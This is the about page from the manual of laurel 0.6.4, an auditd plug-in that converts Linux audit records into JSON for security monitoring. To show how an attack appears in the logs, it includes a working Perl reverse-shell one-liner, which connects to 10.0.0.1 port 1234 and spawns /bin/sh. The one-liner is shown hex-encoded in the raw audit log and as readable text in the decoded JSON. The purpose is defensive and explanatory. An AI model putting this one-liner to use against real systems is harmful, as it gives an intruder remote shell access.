title | section | header | footer |
---|---|---|---|
laurel - About |
7 |
System Administration Utilities |
laurel 0.6.4 |
laurel-about - High-level description of laurel(8)
design, rationale, features
While logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful for host-based security monitoring, the log format is not well-suited for at-scale analysis in a SIEM.
- All non-trivial events are split across multiple lines that have to be joined together using a message identifier, but current search-centric log analysis systems are quite limited when it comes to join operations.
- Files and program executions are logged via
PATH
andEXECVE
elements. The character set for strings is a limited subset of ASCII no escaping mechanism exists: If a string contains bytes that have special meaning in the format (even space or quote characters), the entire string is hex-encoded. - Argument lists are preserved in
EXECVE
records, but with ana0="…"
,a1="…"
,a2="…"
,a3="…"
naming scheme, they are not easily accessible. - Long command lines may be spread across multiple
EXECVE
event lines. - For numeric values, there is no clear distinction whether they should be interpreted as decimal, octal, or hexadecimal values.
Most audit events are based on either system calls or file operations. Whether or not some suspicious actions should be considered harmful, largely depends on the context in which it takes place. For example, one would not expect most web applications to use netcat
to connect to hosts on the Internet, but an administrator who is logged and over SSH who uses netcat
to debug network issues should raise fewer suspicions. Unfortunately, the only context that can be added for Linux audit events "keys" using the -k
parameter of auditctl(8)
.
Spawning a simple Perl reverse-shell one-liner creates the following 7-line audit log entry that nicely demonstrates some of these shortcomings:
type=SYSCALL msg=audit(1626611363.720:348501): arch=c000003e syscall=59 success=yes exit=0 a0=55c094deb5c0 a1=55c094dea770 a2=55c094dbf1b0 a3=fffffffffffff286 items=3 ppid=722076 pid=724395 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=3 comm="perl" exe="/usr/bin/perl" subj==unconfined key=(null)�ARCH=x86_64 SYSCALL=execve AUID="user" UID="root" GID="root" EUID="root" SUID="root" FSUID="root" EGID="root" SGID="root" FSGID="root"
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B657428532C50465F494E45542C534F434B5F53545245414D2C67657470726F746F62796E616D6528227463702229293B696628636F6E6E65637428532C736F636B616464725F696E2824702C696E65745F61746F6E282469292929297B6F70656E28535444494E2C223E265322293B6F70656E285354444F55542C223E265322293B6F70656E285354444552522C223E265322293B6578656328222F62696E2F7368202D6922293B7D3B
type=CWD msg=audit(1626611363.720:348501): cwd="/root"
type=PATH msg=audit(1626611363.720:348501): item=0 name="/usr/bin/perl" inode=401923 dev=fd:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0�OUID="root" OGID="root"
type=PATH msg=audit(1626611363.720:348501): item=1 name="/usr/bin/perl" inode=401923 dev=fd:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0�OUID="root" OGID="root"
type=PATH msg=audit(1626611363.720:348501): item=2 name="/lib64/ld-linux-x86-64.so.2" inode=404797 dev=fd:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0�OUID="root" OGID="root"
type=PROCTITLE msg=audit(1626611363.720:348501): proctitle=7065726C002D650075736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B657428532C50465F494E45542C534F434B5F53545245414D2C67657470726F746F62796E616D6528227463702229293B696628636F6E6E65637428532C736F636B616464725F696E2824702C696E65745F6174
In addition to (or instead of) writing log files, auditd(8)
can pass log lines to one or multiple plug-ins for further processing, see auditd-plugins(5)
. laurel(8)
is intended to be run as such a plug-in. It reads the audit logs from standard input, parses them, and writes a modified form of the audit log to a different log file.
Log records carrying the same event ID (the msg=audit(TIME:SEQUENCE):
part) are collected into coherent events and output as a JSON Lines-based log format. Most importantly, hex-encoded strings are output as regular JSON strings. RfC8259 mandates that "text exchanged between systems that are not part of a closed ecosystem MUST be encoded using UTF-8", therefore any bytes or byte sequences that are not valid UTF-8 are percent-encoded as described in RfC3986. Numbers are parsed as decimal, octal, or hexadecimal values and output in an unambiguous format. List data (SYSCALL.{a0 … a3}
and EXECVE.a*
) are turned into JSON arrays. PROCTITLE.proctitle
is split at NULL bytes and transformed into a list.
Every audit log line produced by LAUREL is one single JSON object consisting of key/value pairs that contains at least an ID
field.
SYSCALL
,EXECVE
,CWD
,PROCTITLE
fields point to single JSON objects.PATH
,SOCKADDR
fields point to lists of JSON objects.
Every other kernel-produced audit message not mentioned above results in field pointing to a list of JSON objects. Details may change after the list of kernel audit message types has been reviewed.
- Most byte values that represent printable ASCII characters are reproduced as-is (but are subject to JSON string escaping rules).
- Bytes that map to non-printable ASCII characters (less than 32/0x20; 127/0x7f) are percent-encoded.
- Byte values that map to
%
(37/0x25) and+
(42/0x2b) are percent-encoded. - Byte values outside of the ASCII range (greater than 127/0x7f) are reproduced as-is if they are part of a valid UTF-8 sequence. Otherwise, they are percent-encoded.
Handling of special Unicode characters may change in the future.
If auditd(8)
has been configured with log_format=ENRICHED
, it translates some numeric values in the original audit data to strings. Per convention, it adds translated information using all-caps versions of the keys. For example,
arch=c000003e syscall=59 uid=0
get translated to
ARCH=x86_64 SYSCALL=execve UID="root"
by auditd(8)
. All information that is added to records by laurel(8)
follows the same convention, i.e. keys are turned into all-caps. While laurel
can be configured to perform the same translations as auditd(8)
, it can perform other enrichments, including interpreted scripts, collecting specific environment variables, or container information for processes that are run within container environments.
While processing audit records laurel(8)
tracks processes and remembers comm
, exe
, and the event ID associated with the latest execve
event of a process. Processes that are tracked can be assigned labels through various mechanisms and those labels can optionally be propagated to child processes.
Mechanisms by which labels can be assigned include:
- using the key from an audit event (the
-k
option ofauditctl(8)
) - regular expression applied to the executable path (
SYSCALL.exe
field) - regular expression applied to the script path (
SYSCALL.SCRIPT
field, enriched)
The process tracking information can be used to enrich fields containing process ids, including SYSCALL.{pid, ppid}
and OBJ_PID.opid
associated with ptrace
attach or kill
syscalls.
To reduce the high volume of events, it is possible to filter out events by key or by process label. Events that are filtered are still used for process tracking.
The log lines from the Perl reverse shell execution above are processed by laurel(8)
into the following JSON log line:
{"ID":"1626611363.720:348501","SYSCALL":{"arch":"0xc000003e","syscall":59,"success":"yes","exit":0,"a0":"0x55c094deb5c0","a1":"0x55c094dea770","a2":"0x55c094dbf1b0","a3":"0xfffffffffffff286","items":3,"ppid":722076,"pid":724395,"auid":1000,"uid":0,"gid":0,"euid":0,"suid":0,"fsuid":0,"egid":0,"sgid":0,"fsgid":0,"tty":"pts3","ses":3,"comm":"perl","exe":"/usr/bin/perl","subj":"=unconfined","key":null,"ARCH":"x86_64","SYSCALL":"execve","AUID":"user","UID":"root","GID":"root","EUID":"root","SUID":"root","FSUID":"root","EGID":"root","SGID":"root","FSGID":"root","PPID":{"EVENT_ID":"1626611323.973:348120","exe":"/bin/bash","comm":"bash","ppid":3190631}},"EXECVE":{"argc":3,"ARGV":["perl","-e","use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]},"CWD":{"cwd":"/root"},"PATH":[{"item":0,"name":"/usr/bin/perl","inode":401923,"dev":"fd:01","mode":"0o100755","ouid":0,"ogid":0,"rdev":"00:00","nametype":"NORMAL","cap_fp":"0x0","cap_fi":"0x0","cap_fe":0,"cap_fver":"0x0","cap_frootid":"0","OUID":"root","OGID":"root"},{"item":1,"name":"/usr/bin/perl","inode":401923,"dev":"fd:01","mode":"0o100755","ouid":0,"ogid":0,"rdev":"00:00","nametype":"NORMAL","cap_fp":"0x0","cap_fi":"0x0","cap_fe":0,"cap_fver":"0x0","cap_frootid":"0","OUID":"root","OGID":"root"},{"item":2,"name":"/lib64/ld-linux-x86-64.so.2","inode":404797,"dev":"fd:01","mode":"0o100755","ouid":0,"ogid":0,"rdev":"00:00","nametype":"NORMAL","cap_fp":"0x0","cap_fi":"0x0","cap_fe":0,"cap_fver":"0x0","cap_frootid":"0","OUID":"root","OGID":"root"}],"PROCTITLE":{"ARGV":["perl","-e","use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_at"]}}
For process tracking to work properly, the kernel should be configured to log all execve
-like calls and all fork
-like for processes that are expected to use fork
without execve
. See laurel-audit-rules(7)
for details.
laurel(8)
, auditd(8)
, audit.rules(7)
, laurel-audit-rules(7)
- Hilko Bengen <[email protected]>
- Sergej Schmidt <[email protected]>